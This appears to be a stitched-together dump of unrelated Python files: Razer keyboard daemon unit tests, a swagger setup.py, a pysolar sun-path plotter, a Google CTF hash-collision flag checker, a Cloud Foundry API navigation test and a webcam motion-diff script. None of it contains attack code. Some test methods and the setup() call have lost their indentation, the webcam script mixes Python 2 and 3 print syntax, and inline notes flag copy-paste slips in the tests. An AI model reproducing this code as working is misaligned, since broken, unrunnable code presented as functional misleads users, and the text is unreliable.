                await self.ts.create_table(table_name=self.table_name)
            except ResourceExistsError:
                # Leftover table from a previous run; reuse it.
                pass
        self.query_tables = []
|
import multiprocessing
import os
import signal
import tempfile
import time
import unittest
import shutil
import razer.client
import razer_daemon.daemon
import razer._fake_driver as fake_driver
import coverage
def run_daemon(daemon_dir, driver_dir):
    """Run the razer daemon in the foreground against a fake driver directory.

    Executed in a child process by the test fixtures; blocks until the daemon
    is signalled to stop.
    """
    # TODO console_log false
    razer_daemon.daemon.daemonize(foreground=True, verbose=True, console_log=False, run_dir=daemon_dir, pid_file=os.path.join(daemon_dir, 'razer-daemon.pid'), test_dir=driver_dir)
class DeviceManagerTest(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        """Create scratch dirs and a fake BlackWidow Chroma device, then start
        the daemon in a separate process pointed at those dirs."""
        cls._daemon_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemondata')
        cls._tmp_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemontest')
        cls._bw_serial = 'IO0000000000001'
        cls._bw_chroma = fake_driver.FakeDevice('razerblackwidowchroma', serial=cls._bw_serial, tmp_dir=cls._tmp_dir)
        print("Created BlackWidow Chroma endpoints")
        cls._daemon_proc = multiprocessing.Process(target=run_daemon, args=(cls._daemon_dir, cls._tmp_dir))
        cls._daemon_proc.start()
        print("Started daemon")
        # Give the daemon time to come up before any test talks to it.
        time.sleep(5)
    @classmethod
    def tearDownClass(cls):
        """Stop the daemon (SIGINT, escalating to terminate) and remove the
        fake device and scratch directories."""
        print("Stopping daemon")
        os.kill(cls._daemon_proc.pid, signal.SIGINT)
        time.sleep(3)
        if cls._daemon_proc.is_alive():
            print("Daemon still alive...")
            # Give it one more grace period before forcing termination.
            time.sleep(8)
            if cls._daemon_proc.is_alive():
                cls._daemon_proc.terminate()
            if cls._daemon_proc.is_alive():
                print("Failed to kill daemon")
        cls._bw_chroma.close()
        shutil.rmtree(cls._tmp_dir)
        shutil.rmtree(cls._daemon_dir)
        time.sleep(5)
    def setUp(self):
        # Recreate the fake driver endpoints and a fresh client for each test.
        self._bw_chroma.create_endpoints()
        self.device_manager = razer.client.DeviceManager()
    def test_device_list(self):
        # Exactly one fake device was registered in setUpClass.
        self.assertEqual(len(self.device_manager.devices), 1)
    def test_serial(self):
        # Serial reported by the client matches the fake driver endpoint.
        device = self.device_manager.devices[0]
        self.assertEqual(device.serial, self._bw_chroma.get('get_serial'))
    def test_name(self):
        # Device name comes from the fake driver's device_type endpoint.
        device = self.device_manager.devices[0]
        self.assertEqual(device.name, self._bw_chroma.get('device_type'))
    def test_type(self):
        # The BlackWidow Chroma is classified as a keyboard.
        device = self.device_manager.devices[0]
        self.assertEqual(device.type, 'keyboard')
    def test_fw_version(self):
        # Firmware version is read through the fake driver endpoint.
        device = self.device_manager.devices[0]
        self.assertEqual(device.firmware_version, self._bw_chroma.get('get_firmware_version'))
    def test_brightness(self):
        """Brightness percentages map onto the driver's 0-255 scale."""
        device = self.device_manager.devices[0]
        # Test 100%
        device.brightness = 100.0
        self.assertEqual('255', self._bw_chroma.get('set_brightness'))
        self.assertEqual(100.0, device.brightness)
        device.brightness = 50.0
        self.assertEqual('127', self._bw_chroma.get('set_brightness'))
        # 127/255 is not exactly 50%, hence the tolerance.
        self.assertAlmostEqual(50.0, device.brightness, delta=0.4)
        device.brightness = 0.0
        self.assertEqual('0', self._bw_chroma.get('set_brightness'))
        self.assertEqual(0, device.brightness)
    def test_capabilities(self):
        # The public property exposes the internal capabilities dict.
        device = self.device_manager.devices[0]
        self.assertEqual(device.capabilities, device._capabilities)
    def test_device_keyboard_game_mode(self):
        """Game-mode LED state round-trips through the fake driver."""
        device = self.device_manager.devices[0]
        self._bw_chroma.set('mode_game', '1')
        self.assertTrue(device.game_mode_led)
        device.game_mode_led = False
        self.assertEqual(self._bw_chroma.get('mode_game'), '0')
        device.game_mode_led = True
        self.assertEqual(self._bw_chroma.get('mode_game'), '1')
    def test_device_keyboard_macro_mode(self):
        """Macro-mode LED state and effect round-trip through the fake driver."""
        device = self.device_manager.devices[0]
        self._bw_chroma.set('mode_macro', '1')
        self.assertTrue(device.macro_mode_led)
        device.macro_mode_led = False
        self.assertEqual(self._bw_chroma.get('mode_macro'), '0')
        device.macro_mode_led = True
        self.assertEqual(self._bw_chroma.get('mode_macro'), '1')
        self._bw_chroma.set('mode_macro_effect', '0')
        self.assertEqual(device.macro_mode_led_effect, razer.client.constants.MACRO_LED_STATIC)
        device.macro_mode_led_effect = razer.client.constants.MACRO_LED_BLINK
        # NOTE(review): after setting macro_mode_led_effect this asserts on
        # 'mode_macro' rather than 'mode_macro_effect' — confirm that is the
        # intended endpoint and not a copy/paste slip.
        self.assertEqual(self._bw_chroma.get('mode_macro'), str(razer.client.constants.MACRO_LED_BLINK))
    def test_device_keyboard_effect_none(self):
        # Enabling the "none" effect writes '1' to the driver endpoint.
        device = self.device_manager.devices[0]
        device.fx.none()
        self.assertEqual(self._bw_chroma.get('mode_none'), '1')
    def test_device_keyboard_effect_spectrum(self):
        # Enabling the spectrum effect writes '1' to the driver endpoint.
        device = self.device_manager.devices[0]
        device.fx.spectrum()
        self.assertEqual(self._bw_chroma.get('mode_spectrum'), '1')
    def test_device_keyboard_effect_wave(self):
        """Wave effect accepts the direction constants and rejects others."""
        device = self.device_manager.devices[0]
        device.fx.wave(razer.client.constants.WAVE_LEFT)
        self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_LEFT))
        device.fx.wave(razer.client.constants.WAVE_RIGHT)
        self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_RIGHT))
        with self.assertRaises(ValueError):
            device.fx.wave('lalala')
    def test_device_keyboard_effect_static(self):
        """Static effect sends RGB bytes; floats are rejected, out-of-range
        ints are clamped to 0-255."""
        device = self.device_manager.devices[0]
        device.fx.static(255, 0, 255)
        self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
        for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
            with self.assertRaises(ValueError):
                device.fx.static(red, green, blue)
        # Integer components outside 0-255 are clamped rather than rejected.
        device.fx.static(256, 0, 700)
        self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
    def test_device_keyboard_effect_reactive(self):
        """Reactive effect sends a time byte followed by RGB; floats and bad
        time values are rejected, out-of-range ints clamped."""
        device = self.device_manager.devices[0]
        time = razer.client.constants.REACTIVE_500MS
        device.fx.reactive(255, 0, 255, time)
        self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
        for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
            with self.assertRaises(ValueError):
                device.fx.reactive(red, green, blue, time)
        # Integer components outside 0-255 are clamped rather than rejected.
        device.fx.reactive(256, 0, 700, time)
        self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
        with self.assertRaises(ValueError):
            device.fx.reactive(255, 0, 255, 'lalala')
    def test_device_keyboard_effect_breath_single(self):
        """Single-colour breath effect sends RGB bytes with the same
        float-rejection/int-clamping validation as static."""
        device = self.device_manager.devices[0]
        device.fx.breath_single(255, 0, 255)
        self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
        for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
            with self.assertRaises(ValueError):
                device.fx.breath_single(red, green, blue)
        device.fx.breath_single(256, 0, 700)
        self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
    def test_device_keyboard_effect_breath_dual(self):
        """Dual-colour breath effect sends two RGB triples with the same
        validation behaviour as the single-colour variant."""
        device = self.device_manager.devices[0]
        device.fx.breath_dual(255, 0, 255, 255, 0, 0)
        self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
        for r1, g1, b1, r2, g2, b2 in ((256.0, 0, 0, 0, 0, 0), (0, 256.0, 0, 0, 0, 0), (0, 0, 256.0, 0, 0, 0),
                                       (0, 0, 0, 256.0, 0, 0), (0, 0, 0, 0, 256.0, 0), (0, 0, 0, 0, 0, 256.0)):
            with self.assertRaises(ValueError):
                device.fx.breath_dual(r1, g1, b1, r2, g2, b2)
        device.fx.breath_dual(256, 0, 700, 255, 0, 0)
        self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
    def test_device_keyboard_effect_breath_random(self):
        # Random breath takes no colours; the driver endpoint just gets '1'.
        device = self.device_manager.devices[0]
        device.fx.breath_random()
        self.assertEqual(self._bw_chroma.get('mode_breath'), '1')
    def test_device_keyboard_effect_ripple(self):
        """Ripple effect streams custom key-row frames to the driver."""
        device = self.device_manager.devices[0]
        refresh_rate = 0.01
        device.fx.ripple(255, 0, 255, refresh_rate)
        # Ripple renders asynchronously; wait for at least one frame.
        time.sleep(0.1)
        custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
        self.assertGreater(len(custom_effect_payload), 1)
        self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
        # NOTE(review): the validation checks below invoke fx.reactive, not
        # fx.ripple — this looks like a copy/paste slip from the reactive
        # test; confirm intent before relying on this coverage.
        for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
            with self.assertRaises(ValueError):
                device.fx.reactive(red, green, blue, refresh_rate)
        with self.assertRaises(ValueError):
            device.fx.reactive(255, 0, 255, 'lalala')
        # Stop the ripple render thread before the next test.
        device.fx.none()
def test_device_keyboard_effect_random_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple_random(refresh_rate)
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
with self.assertRaises(ValueError):
device.fx.ripple_random('lalala')
device.fx.none()
    def test_device_keyboard_effect_framebuffer(self):
        """Exercise the advanced matrix: direct draw, framebuffer save/or, binary dump.

        The sequence below is order-sensitive: each draw reads the current
        matrix/framebuffer state left by the previous step.
        """
        device = self.device_manager.devices[0]
        device.fx.advanced.matrix.set(0, 0, (255, 0, 255))
        self.assertEqual(device.fx.advanced.matrix.get(0, 0), (255, 0, 255))
        device.fx.advanced.draw()
        # First payload bytes: leading 0x00 (presumably the row index -- TODO
        # confirm) followed by the magenta pixel FF 00 FF.
        custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
        self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\x00\xFF')
        device.fx.advanced.matrix.to_framebuffer() # Save 255, 0, 255
        device.fx.advanced.matrix.reset() # Clear FB
        device.fx.advanced.matrix.set(0, 0, (0, 255, 0))
        device.fx.advanced.draw_fb_or() # Draw FB or'd with Matrix
        custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
        # magenta (FF,00,FF) OR green (00,FF,00) == white (FF,FF,FF)
        self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\xFF\xFF')
        # Append that to FB
        device.fx.advanced.matrix.to_framebuffer_or()
        device.fx.advanced.draw()
        custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
        # to_binary() must reproduce exactly what draw() sent to the daemon.
        binary = device.fx.advanced.matrix.to_binary()
        self.assertEqual(binary, custom_effect_payload)
def test_device_keyboard_macro_enable(self):
device = self.device_manager.devices[0]
device.macro.enable_macros()
self.assertEqual(self._bw_chroma.get('macro_keys'), '1')
def test_device_keyboard_macro_add(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M1', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M1', macros)
with self.assertRaises(ValueError):
device.macro.add_macro('M6', url_macro) # Unknown key
with self.assertRaises(ValueError):
device.macro.add_macro('M1', 'lalala') # Not a sequnce
with self.assertRaises(ValueError):
device.macro.add_macro('M1', ['lalala']) # Bad element in sequence
def test_device_keyboard_macro_del(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M2', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M2', macros)
device.macro.del_macro('M2')
macros = device.macro.get_macros()
self.assertNotIn('M2', macros)
with self.assertRaises(ValueError):
device.macro.del_macro('M6') # Unknown key
|
# coding: utf-8
"""
Gene Feature Enumeration Service
The Gene Feature Enumeration (GFE) Submission service provides an API for converting raw sequence data to GFE. It provides both a RESTful API and a simple user interface for converting raw sequence data to GFE results. Sequences can be submitted one at a time or as a fasta file. This service uses <a href=\"https://github.com/nmdp-bioinformatics/service-feature\">nmdp-bioinformatics/service-feature</a> for encoding the raw sequence data and <a href=\"https://github.com/nmdp-bioinformatics/HSA\">nmdp-bioinformatics/HSA</a> for aligning the raw sequence data. The code is open source, and available on <a href=\"https://github.com/nmdp-bioinformatics/service-gfe-submission\">GitHub</a>.<br><br>Go to <a href=\"http://service-gfe-submission.readthedocs.io\">service-gfe-submission.readthedocs.io</a> for more information
OpenAPI spec version: 1.0.7
Contact: mhalagan@nmdp.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import sys
from setuptools import setup, find_packages
NAME = "swagger_client"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil"]
setup(
name=NAME,
version=VERSION,
description="Gene Feature Enumeration Service",
author_email="mhalagan@nmdp.org",
url="",
keywords=["Swagger", "Gene Feature Enumeration Service"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
The Gene Feature Enumeration (GFE) Submission service provides an API for converting raw sequence data to GFE. It provides both a RESTful API and a simple user interface for converting raw sequence data to GFE results. Sequences can be submitted one at a time or as a fasta file. This service uses <a href=\"https://github.com/nmdp-bioinformatics/service-feature\">nmdp-bioinformatics/service-feature</a> for encoding the raw sequence data and <a href=\"https://github.com/nmdp-bioinformatics/HSA\">nmdp-bioinformatics/HSA</a> for aligning the raw sequence data. The code is open source, and available on <a href=\"https://github.com/nmdp-bioinformatics/service-gfe-submission\">GitHub</a>.<br><br>Go to <a href=\"http://service-gfe-submission.readthedocs.io\">service-gfe-submission.readthedocs.io</a> for more information
"""
)
|
from pysolar.solar import *
import numpy as np
import matplotlib.pyplot as plt
import datetime
# Observer latitude in degrees (longitude is fixed to 0 inside solar_path).
latitude_deg = 45
# month, day, shift because of DST
dates_hour = [(12, 23, 1), (6, 22, 0)]
# Reference dates (month, day) for which a full daily solar path is drawn.
dates = [(12, 23), (1, 20), (2, 18), (3, 21), (4, 17), (5, 21), (6, 22)]
# dates = []
# for month in range(6):
#     for day in range(27):
#         dates.append((month + 1,day + 1))
# TODO : find how to use solar time instead of UTC time
# TODO : fix the dependance on hour rectification not to have the curve
# going backward (use tuples and reorganize them?)
def solar_path(latitude_deg, month, day, hour=3, step_hour=0.5, nb_step=48, plot='yes'):
    """Compute (and optionally plot) the sun's azimuth/altitude path for one date.

    Samples the solar position every ``step_hour`` hours, ``nb_step`` times,
    starting at ``hour`` o'clock (UTC) on the given 2015 date, at longitude 0.
    Altitudes below the horizon are clamped to 0.

    Returns a ``(azimuth, altitude)`` pair of lists of two-decimal strings
    (kept as strings for parity with the original behaviour).
    """
    longitude_deg = 0
    current = datetime.datetime(2015, month, day, hour, 0, 0)
    altitude = []
    azimuth = []
    delta = datetime.timedelta(hours=step_hour)
    # Stepping a fixed number of times (rather than sweeping every clock hour)
    # avoids the plotted curve doubling back on itself.
    # (The original also kept an unused `timestamp = d` copy each step; removed.)
    for _ in range(nb_step):
        altitude_deg = get_altitude(latitude_deg, longitude_deg, current)
        # taking off what is under the horizon
        if altitude_deg < 0:
            altitude_deg = 0
        # Work-around to use the 180-degrees-south azimuth convention.
        # Note: % binds tighter than -, so the modulo applies to get_azimuth().
        azimuth_deg = 180 - get_azimuth(latitude_deg, longitude_deg, current) % 360
        if azimuth_deg < 0:
            azimuth_deg = azimuth_deg + 360
        altitude.append(format(altitude_deg, '.2f'))
        azimuth.append(format(azimuth_deg, '.2f'))
        current = current + delta
    if plot == 'yes':
        plt.plot(azimuth, altitude)
    return (azimuth, altitude)
def hours_plot(latitude_deg, dates_hour):
    """Plot iso-hour lines: the sun position at each hour on each reference date.

    ``dates_hour`` is a sequence of (month, day, dst_shift) tuples; the shift
    compensates for daylight-saving time.
    """
    for h in range(23):
        azimuth_at_h = []
        altitude_at_h = []
        for (month, day, shift) in dates_hour:
            # One half-hour sample at this (DST-corrected) hour. The original
            # called solar_path twice with identical arguments and took one
            # element of each result; a single call suffices.
            azimuth, altitude = solar_path(
                latitude_deg, month, day, h - shift + 1, 0.5, 1, 'no')
            azimuth_at_h.append(azimuth)
            altitude_at_h.append(altitude)
        plt.plot(azimuth_at_h, altitude_at_h)
    # TODO : add legend to the plot (hours and date)
# TODO : add legend to the plot (hours and date)
def plotter():
    """plot the solar diagram"""
    # Fixed axes: azimuth 30-330 degrees (x), altitude 0-90 degrees (y).
    plt.title('Solar zenith')
    plt.xlabel('azimuth')
    plt.ylabel('angle')
    plt.axis([30, 330, 0, 90])
    plt.grid(True)
    # plt.locator_params(axis = 'x', nbins=40)
    plt.xticks(range(30, 330, 10))
    plt.yticks(range(0, 90, 5))
    plt.show()
# Script driver: one daily path per reference date, then iso-hour lines, then render.
for (month, day) in dates:
    solar_path(latitude_deg, month, day)
hours_plot(latitude_deg, dates_hour)
plotter()
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is the stdio program that verifies a submitted will. It reads the
submitted will from stdin. If the will is different than the original,
yet has the same hash digest, then we print a success message that includes the
CTF flag. Otherwise we print a failure message.
This program should be run once per submission. It exits after printing the
result message to stdout.
"""
import hasher
import json
import sys
with open("metadata.json", "r") as jsonFile, open("farnsworth_fry_will", "rb") as willFile:
    # Parenthesised print calls: for a single argument the output is identical
    # under Python 2, and the file is no longer a syntax error under Python 3.
    print("Welcome to the will authenticity checker service.")
    print("Please provide the will from Professor Herbert J. Farnsworth:")
    sys.stdout.flush()

    # The CTF flag lives in the challenge metadata.
    data = json.load(jsonFile)
    flag = data['challenge']['flag'].strip().encode()

    originalWill = willFile.read()
    originalHash = hasher.findDigest(originalWill)

    # Read exactly as many bytes as the original will; the submission must be
    # a same-length, different document with a colliding digest.
    newWill = sys.stdin.read(len(originalWill))
    if newWill == originalWill:
        print("The new will must be different than the original.")
        sys.exit(0)

    newHash = hasher.findDigest(newWill)
    if newHash != originalHash:
        print("The new hash does not match the original.")
        print("The original hash is: %064x" % originalHash)
        print("The new hash is: %064x" % newHash)
        sys.exit(0)

    print("Success! You, Bender the robot, inherit everything, and Fry gets nothing.")
    print("Among the professor's notes that you inherited, you found:")
    print(flag)
|
import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestNavigation(unittest.TestCase):
    """Walk the v2 API object graph (org -> space -> apps/services) and check
    that every child can navigate back to its parent.

    Each inner loop breaks after the first element -- the point is to exercise
    the navigation endpoints, not to enumerate everything.
    """
    def test_all(self):
        client = build_client_from_configuration()
        for organization in client.v2.organizations:
            # Only drill into the organization configured for the test run.
            if organization['metadata']['guid'] == client.org_guid:
                for space in organization.spaces():
                    if space['metadata']['guid'] == client.space_guid:
                        # space -> organization round trip
                        organization_reloaded = space.organization()
                        self.assertEqual(organization['metadata']['guid'], organization_reloaded['metadata']['guid'])
                        for application in space.apps():
                            if application['metadata']['guid'] == client.app_guid:
                                # app -> space round trip, then poke the app endpoints
                                space_reloaded = application.space()
                                self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
                                application.start()
                                application.stats()
                                application.instances()
                                application.summary()
                                for _ in application.routes():
                                    break
                                for _ in application.service_bindings():
                                    break
                                for _ in application.events():
                                    break
                                application.stop()
                        for service_instance in space.service_instances():
                            # service instance -> space round trip
                            space_reloaded = service_instance.space()
                            self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
                            for service_binding in service_instance.service_bindings():
                                service_instance_reloaded = service_binding.service_instance()
                                self.assertEqual(service_instance['metadata']['guid'],
                                                 service_instance_reloaded['metadata']['guid'])
                                service_binding.app()
                                break
                            for route in service_instance.routes():
                                service_instance_reloaded = route.service_instance()
                                self.assertEqual(service_instance['metadata']['guid'],
                                                 service_instance_reloaded['metadata']['guid'])
                                for _ in route.apps():
                                    break
                                space_reloaded = route.space()
                                self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
                                break
                            # plan/service navigation off the first instance only
                            service_plan = service_instance.service_plan()
                            for _ in service_plan.service_instances():
                                break
                            service = service_plan.service()
                            for _ in service.service_plans():
                                break
                            break
|
#!/usr/bin/python
import time
import os
import sys
import pygame
import numpy
from PIL import Image, ImageDraw, ImageChops
# ---- usage banner ----
print("")
print("")
print(" USE l=3 to take a photo every 3 somethings, try a 1000 or 2")
print(" t to take triggered photos ")
print(" cap=/home/pi/folder/ to set caps path other than current dir")
print(" ")

pi_paper = False #updates pi wall paper, use -nopaper to turn it off.

# uvccapture defaults: saturation/contrast/gain/brightness and frame size.
s_val = "10"
c_val = "2"
g_val = "10"
b_val = "15"
x_dim = 1600
y_dim = 896
additonal_commands = "-d/dev/video1 -w"

try:
    cappath = os.getcwd()
    cappath += "/"
except Exception:  # narrowed from a bare except so SystemExit/KeyboardInterrupt pass through
    print(" COULD NOT GET CURRENT DIR SET WITH A FLAG ")
    cappath = "./"
    print(" COULD NOT GET CURRENT DIR SET WITH A FLAG ")

# Optional overrides from camera_settings.txt, one key=value per line.
loc_settings = "./camera_settings.txt"
try:
    with open(loc_settings, "r") as f:
        for line in f:
            s_item = line.split("=")
            if s_item[0] == "s_val":
                s_val = s_item[1].split("\n")[0]
            elif s_item[0] == "c_val":
                c_val = s_item[1].split("\n")[0]
            elif s_item[0] == "g_val":
                g_val = s_item[1].split("\n")[0]
            elif s_item[0] == "b_val":
                b_val = s_item[1].split("\n")[0]
            elif s_item[0] == "x_dim":
                x_dim = s_item[1].split("\n")[0]
            elif s_item[0] == "y_dim":
                y_dim = s_item[1].split("\n")[0]
            elif s_item[0] == "additonal_commands":
                additonal_commands = s_item[1].split("\n")[0]
except Exception:  # missing/unreadable config: keep the defaults above
    print("No config file for camera, using default")
    print("Run cam_config.py to create one")
def photo():
    """Capture one webcam frame with uvccapture, save it, return the filename.

    Uses the module-level capture settings (cappath, additonal_commands,
    x_dim/y_dim); when pi_paper is set, also makes the capture the desktop
    wallpaper.
    """
    # Second-resolution epoch timestamp as the filename suffix.
    timenow = time.time()
    timenow = str(timenow)[0:10]
    filename = "cap_"+str(timenow)+".jpg"
    cmd = str("uvccapture "+additonal_commands+" -x"+str(x_dim)+" -y"+str(y_dim)+" -v -t0 -o"+cappath+filename)
    print("####")
    print("####")
    # print(cmd) is identical for one argument on Python 2 and is valid on
    # Python 3, unlike the original `print cmd` statement.
    print(cmd)
    print("####")
    print("####")
    os.system(cmd)
    print("Image taken and saved to "+cappath+filename)
    if pi_paper == True:
        os.system("export DISPLAY=:0 && pcmanfm --set-wallpaper "+cappath+filename)
    return filename
# ---- command-line handling: wp/wallpaper, cap=<dir>, l=<delay>, t ----
if 'wp' in sys.argv or 'wallpaper' in sys.argv:
    pi_paper = True
    print(" Going to try changing wall paper")
loop = False
trig = False
for argu in sys.argv[1:]:
    try:
        thearg = str(argu).split('=')[0]
    except:  # NOTE(review): split never raises here; this branch looks unreachable
        thearg = str(argu)
    if thearg == 'cap' or thearg =='cappath':
        cappath = str(argu).split('=')[1]
    elif thearg == 'l' or thearg == 'looped':
        try:
            num = int(str(argu).split('=')[1])
        except:
            print("No speed supplied, taking every 10")
            num = 10
        loop = True
    elif thearg == 't' or thearg == 'TRIGGERED':
        trig = True
print(" Saving files to, " + str(cappath))

# ---- pygame display setup (window sized to the capture resolution) ----
pygame.init()
display_width = x_dim
display_height = y_dim
gameDisplay = pygame.display.set_mode((display_width,display_height))
pygame.display.set_caption('Most recent image')
black = (0,0,0)
white = (255,255,255)
clock = pygame.time.Clock()
crashed = False
import matplotlib.pyplot as plt  # NOTE(review): mid-file import, only used by commented-out debug code below
def show_pic(imgtaken, x=0,y=0):
    # Blit a pygame surface onto the main display at (x, y).
    # NOTE(review): defined but never called below; the main loop blits inline.
    gameDisplay.blit(imgtaken, (x,y))
gameDisplay.fill(white)

# Take two initial frames and build per-channel change masks between them
# (difference beyond +/-30 counts as movement).
c_photo = photo()
pil_c_photo = Image.open(c_photo)
numpy_pic = numpy.array(pil_c_photo)
b_photo = photo()
pil_b_photo = Image.open(b_photo)
numpy_pic_b = numpy.array(pil_b_photo)
mask = numpy_pic_b > numpy_pic + 30 #the +30 gets rid of noise
mask2 = numpy_pic_b < numpy_pic - 30
lol = mask + mask2
e_pic = numpy_pic.copy()
# NOTE(review): this clobbers the l=<delay> value parsed above; the main loop
# then reuses num both as frame counter and as pygame wait time -- confirm intended.
num = 0
# Main loop: take a frame, diff it against the previous one, write a processed
# "numpy_<ts>.jpg" and display it; repeats in looped/triggered mode.
while not crashed:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            crashed = True
    timenow = time.time()
    e_photo = str(timenow).split(".")[0]  # NOTE(review): dead store, overwritten next line
    e_photo= "numpy_"+str(timenow)+".jpg"
    num = num + 1  # NOTE(review): also the wait time used by pygame.time.wait below
    # Shift frames: current becomes previous, then capture a new current.
    b_photo = c_photo
    c_photo = photo()
    numpy_pic_b = numpy_pic.copy()
    pil_c_photo = Image.open(c_photo)
    numpy_pic = numpy.array(pil_c_photo)
    print numpy_pic.size
    #print len(numpy_pic[3])
    print "###"
    #print numpy_pic[1:,1,1]
    #a = np.arange(100)
    print "##########"
    #numpy_pic[1:500, range(0, len(numpy_pic[2]), 10), 1] = 0
    #for x in numpy_pic[1:500, range(0, len(numpy_pic[2])), 1]:
    #    if x >= 100:
    #        x = 255
    #for x in range(10,170,10):
    #    mask = numpy_pic < x
    #    numpy_pic[mask] = 255-x #numpy_pic[mask] + numpy_pic[mask]
    #for x in range(200,255,5):
    #    mask = numpy_pic > x
    #    numpy_pic[mask] = 0+(x/10) # numpy_pic[mask] / numpy_pic[mask]+(numpy_pic[mask]/numpy_pic[mask])
    #print numpy_pic[1:,1,1]
    #print numpy_pic.min()
    print "###"
    #print numpy_pic.shape #Array dimensions
    #print numpy_pic.ndim #Number of array dimensions
    #print numpy_pic.dtype #Data type of array elements
    #print numpy_pic.dtype.name #Name of data type
    #print numpy_pic.mean()
    #print numpy_pic.max()
    #print numpy_pic.min()
    #print numpy.info(numpy.ndarray.dtype)
    #print numpy_pic.astype(int)
    #mask = numpy_pic > numpy_pic_b
    #mask = numpy_pic[:, :, 2] > 150
    #numpy_pic[mask] = [0, 0, 255]
    #lol = numpy_pic +
    #mask = numpy_pic_b > numpy_pic + 30 #the +30 gets rid of noise
    #mask2 = numpy_pic_b < numpy_pic - 30
    # Per-channel darker/lighter masks between consecutive frames.
    margin = 20
    maskr = numpy_pic[:, :, 0] < numpy_pic_b[:, :, 0] - margin
    maskg = numpy_pic[:, :, 1] < numpy_pic_b[:, :, 1] - margin
    maskb = numpy_pic[:, :, 2] < numpy_pic_b[:, :, 2] - margin
    maskr2 = numpy_pic[:, :, 0] > numpy_pic_b[:, :, 0] + margin
    maskg2 = numpy_pic[:, :, 1] > numpy_pic_b[:, :, 1] + margin
    maskb2 = numpy_pic[:, :, 2] > numpy_pic_b[:, :, 2] + margin
    #numpy_pic[mask] = [0, 0, 255]
    #lol_old = lol
    #lol = mask + mask2
    #lol = lol + lol_old
    # Rendering mode selector; only 'True'/'False'/'ohhh' branches exist, and
    # 'ohhh' is hard-wired here.
    persist = 'ohhh'
    if persist == 'True':
        numpy_pic[maskr] = [255, 0, 0]
        numpy_pic[maskg] = [0, 255, 0]
        numpy_pic[maskb] = [0, 0, 255]
        numpy_pic[maskb2] = [0, 0, 100]
        numpy_pic[maskr2] = [100, 0, 0]
        numpy_pic[maskg2] = [0, 100, 0]
        Image.fromarray(numpy_pic).save(e_photo)
    elif persist == 'False':
        old_e = e_pic
        e_pic = numpy_pic.copy()
        e_pic[maskr] = [255, 0, 0]
        e_pic[maskg] = [0, 255, 0]
        e_pic[maskb] = [0, 0, 255]
        e_pic[maskr2] = [100, 0, 0]
        e_pic[maskg2] = [0, 100, 0]
        e_pic[maskb2] = [0, 0, 100]
        show1 = 'waa'
        if show1 == '1':
            e_pic = ((e_pic/4) - (numpy_pic))*3
            e_pic = e_pic / 3 + old_e / 2
        elif show1 == 'tripsy':
            e_pic = ((e_pic/4) - (numpy_pic))*3
            e_pic = e_pic - old_e / 2
        elif show1 == 'waa':
            e_pic = ((e_pic/4) - (numpy_pic))*3
            #e_pic = old_e * 0.8 + e_pic * 0.2
        Image.fromarray(e_pic).save(e_photo)
    elif persist == 'ohhh':
        old_e = e_pic.copy()
        mask_b_pic = numpy_pic.copy()
        mask_d_pic = numpy_pic.copy()
        mask_b_pic[maskr] = [255, 255, 255]
        mask_b_pic[maskg] = [255, 255, 255]
        mask_b_pic[maskb] = [255, 255, 255]
